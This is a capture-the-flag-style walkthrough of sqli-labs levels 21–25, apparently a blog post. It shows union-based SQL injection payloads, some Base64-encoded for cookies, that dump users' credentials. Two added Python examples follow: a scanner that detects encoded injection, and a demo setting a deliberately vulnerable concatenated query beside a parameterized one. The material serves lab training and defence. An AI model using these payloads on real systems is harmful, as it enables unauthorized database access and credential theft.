Level 21 (less-21)
Step 1: Enter Username: admin, Password: admin and capture the request with Burp Suite.
Step 2: Append ' to the Cookie value; the resulting error shows that the closing syntax is ') #
Each payload below is then Base64-encoded in Burp: select it, right-click -> Convert selection -> Base64 -> Base64-encode
Step 3: Determine the number of columns
') order by 4 # => Jykgb3JkZXIgYnkgNCAj
') order by 3 # => Jykgb3JkZXIgYnkgMyAj
There are three columns.
Step 4: Find the echo points
') union select 1,2,3 # => JykgdW5pb24gc2VsZWN0IDEsMiwzICM=
Step 5: Query the current database name
') union select 1,2,database() # => JykgdW5pb24gc2VsZWN0IDEsMixkYXRhYmFzZSgpICM=
Step 6: Query the table names
Payload: ') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #
Encoded: JykgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpLDMgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknICM=
Step 7: Query the column names
Payload: ') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' #
Encoded: JykgdW5pb24gc2VsZWN0IDEsZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSwzIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfc2NoZW1hPSdzZWN1cml0eScgYW5kIHRhYmxlX25hbWU9J3VzZXJzJyAj
Step 8: Query all data in the table
Payload: ') union select 1,2,group_concat(id,username,password) from users #
Encoded: JykgdW5pb24gc2VsZWN0IDEsMixncm91cF9jb25jYXQoaWQsdXNlcm5hbWUscGFzc3dvcmQpIGZyb20gdXNlcnMgIw==
Level 22 (less-22)
Step 1: Enter Username: admin, Password: admin and capture the request with Burp Suite.
Step 2: Append ' to the Cookie value; the resulting error shows that the closing syntax is " #
Each payload below is then Base64-encoded in Burp: select it, right-click -> Convert selection -> Base64 -> Base64-encode
Step 3: Determine the number of columns
" order by 4 # => IiBvcmRlciBieSA0ICM=
" order by 3 # => IiBvcmRlciBieSAzICM=
There are three columns.
Step 4: Find the echo points
" union select 1,2,3 # => IiB1bmlvbiBzZWxlY3QgMSwyLDMgIw==
Step 5: Query the current database name
" union select 1,2,database() # => IiB1bmlvbiBzZWxlY3QgMSwyLGRhdGFiYXNlKCkgIw==
Step 6: Query the table names
Payload: " union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #
Encoded: IiB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQodGFibGVfbmFtZSksMyBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSdzZWN1cml0eScgIw==
Step 7: Query the column names
Payload: " union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' #
Encoded: IiB1bmlvbiBzZWxlY3QgMSxncm91cF9jb25jYXQoY29sdW1uX25hbWUpLDMgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9zY2hlbWE9J3NlY3VyaXR5JyBhbmQgdGFibGVfbmFtZT0ndXNlcnMnICM=
Step 8: Query all data in the table
Payload: " union select 1,2,group_concat(id,username,password) from users #
Encoded: IiB1bmlvbiBzZWxlY3QgMSwyLGdyb3VwX2NvbmNhdChpZCx1c2VybmFtZSxwYXNzd29yZCkgZnJvbSB1c2VycyAj
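In less-21 and less-22 the injection travels inside a Base64-encoded Cookie, which is why a filter that only looks at the raw request text misses it. The Python below is an added example (not code from sqli-labs or from this post) of the check a defender would put in a log scanner or request inspector: peel Base64 off each cookie value one layer at a time and flag SQL syntax in any layer. The sample Cookie header, the cookie names, the indicator regex and the benign values are constructed; the two suspicious values are the encoded less-21 database() payload and a copy of the less-22 column-name payload that was Base64-encoded twice, which shows why a single decode is not enough.

```python
import base64
import binascii
import re
from typing import Dict, List, Optional

# Constructed indicator set: UNION/ORDER BY probes, information_schema
# lookups, group_concat()/database() calls, and a closing quote or
# parenthesis followed by a comment marker (the ') # and " # closers).
SQLI_INDICATORS = re.compile(
    r"(?i)(\bunion\s+(all\s+)?select\b|\border\s+by\b|information_schema"
    r"|group_concat\s*\(|\bdatabase\s*\(|['\")]\s*(#|--))"
)

# The less-22 column-name payload, Base64-encoded twice (constructed sample).
DOUBLE_ENCODED = (
    "SWlCMWJtbHZiaUJ6Wld4bFkzUWdNU3huY205MWNGOWpiMjVqWVhRb1kyOXNkVzF1WDI1aGJXVXBM"
    "RE1nWm5KdmJTQnBibVp2Y20xaGRHbHZibDl6WTJobGJXRXVZMjlzZFcxdWN5QjNhR1Z5WlNCMFlX"
    "SnNaVjl6WTJobGJXRTlKM05sWTNWeWFYUjVKeUJoYm1RZ2RHRmliR1ZmYm1GdFpUMG5kWE5sY25N"
    "bklDTT0="
)

# Constructed Cookie header: uname carries the less-21 database() payload,
# extra the double-encoded value above, session is Base64 of "admin", and
# raw is not Base64 at all.
SAMPLE_HEADER = (
    "uname=JykgdW5pb24gc2VsZWN0IDEsMixkYXRhYmFzZSgpICM=; "
    "extra=" + DOUBLE_ENCODED + "; session=YWRtaW4=; raw=plain-text"
)


def decode_layers(value: str, max_depth: int = 3) -> List[str]:
    """Repeatedly Base64-decode value and return every decoded layer.

    Stops at the first layer that is not valid Base64 or not printable
    text, so plain or binary cookie values yield an empty list.
    """
    layers: List[str] = []
    current = value
    for _ in range(max_depth):
        try:
            text = base64.b64decode(current, validate=True).decode("utf-8")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            break
        if not text.isprintable():
            break
        layers.append(text)
        current = text
    return layers


def inspect_cookie(name: str, value: str,
                   max_depth: int = 3) -> Optional[Dict[str, object]]:
    """Return a finding if any decoded layer of value contains SQL syntax."""
    for depth, text in enumerate(decode_layers(value, max_depth), start=1):
        match = SQLI_INDICATORS.search(text)
        if match:
            return {"cookie": name, "depth": depth,
                    "indicator": match.group(0), "decoded": text}
    return None


def scan_cookie_header(header: str) -> List[Dict[str, object]]:
    """Split a raw Cookie header into name=value pairs and inspect each."""
    findings = []
    for part in header.split(";"):
        if "=" not in part:
            continue
        name, value = part.strip().split("=", 1)
        finding = inspect_cookie(name, value)
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_cookie_header(SAMPLE_HEADER):
        print(f"{f['cookie']}: layer {f['depth']} matched {f['indicator']!r}")
```

The depth field tells an analyst how many encodings wrapped the SQL; values that decode to SQL only at depth 2 or deeper are a strong signal on their own, since legitimate session cookies are rarely encoded more than once.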
Level 23 (less-23)
Step 1: ?id=1 --+ returns data
?id=1 # returns data
So --+ and # are filtered.
Step 2: Determine the closing syntax: ?id=1' and ' 1 ' =' 1
Step 3: Find the echo parameters
http://127.0.0.1/less-23/?id=-1%27%20union%20select%201,2,3%20and%20%27%201%20%27%20=%27%201
Step 4: Query the database name
Step 5: Query the table names
Step 6: Query the column names
Level 24 (less-24)
Step 1: Register a new user
Step 2: Log in -> change the password
The password is changed successfully.
Level 25 (less-25)
Step 1: The keywords or and and are filtered.
Use a union query; the closing syntax is id=1' --+
Step 2: Find the echo parameters
http://127.0.0.1/less-25/?id=-1%27%20union%20select%201,2,3%20--+
Step 3: Query the database name
http://127.0.0.1/less-25/?id=-1%27%20union%20select%201,database(),3%20--+
Step 4: Query the table names
Step 5: Query the column names
Step 6: Query all data
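Less-23 strips the comment markers and less-25 strips the words and/or, yet both levels still fall to the payloads above, because a keyword blacklist never changes the fact that the parameter is spliced into the SQL text. The Python/sqlite3 block below is an added example (not the sqli-labs code) that puts the concatenated query those levels model next to a parameterized one and feeds both the URL-decoded payloads from this walkthrough: the less-23 closer `-1' union select 1,2,3 and ' 1 ' =' 1` and the less-25 step-2 probe `-1' union select 1,2,3 --+` (with `+` decoded to a space; the step-3 database() variant is not used because SQLite has no such function). The users table, its rows and the function names are constructed.

```python
import sqlite3

# URL-decoded forms of the two payloads from the walkthrough above.
LESS23_PAYLOAD = "-1' union select 1,2,3 and ' 1 ' =' 1"
LESS25_PAYLOAD = "-1' union select 1,2,3 -- "


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the lab's users table (in-memory SQLite)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "pw-alice"), (2, "bob", "pw-bob")],
    )
    conn.commit()
    return conn


def lookup_concat(conn: sqlite3.Connection, id_param: str) -> list:
    """Vulnerable pattern: the parameter is pasted into the SQL text.

    A quote inside id_param ends the string literal and everything after
    it is parsed as SQL, no matter which words a blacklist removed.
    """
    sql = f"SELECT id, username, password FROM users WHERE id='{id_param}'"
    return conn.execute(sql).fetchall()


def lookup_param(conn: sqlite3.Connection, id_param: str) -> list:
    """Hardened pattern: the whole input is bound as one value.

    The driver sends the SQL and the value separately, so the quote,
    UNION and comment inside id_param are just characters compared
    against the id column and match nothing.
    """
    sql = "SELECT id, username, password FROM users WHERE id=?"
    return conn.execute(sql, (id_param,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    for payload in ("1", LESS23_PAYLOAD, LESS25_PAYLOAD):
        print("concat :", payload, "->", lookup_concat(db, payload))
        print("param  :", payload, "->", lookup_param(db, payload))
```

With the concatenated query the less-25 payload returns the attacker-chosen row (1, 2, 3), and the less-23 payload returns (1, 2, 0) because its trailing `and ' 1 ' =' 1'` evaluates to false inside the injected SELECT; the parameterized query returns no rows for either input and still finds the real user for `1`.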
From: https://blog.csdn.net/2301_82061181/article/details/141424417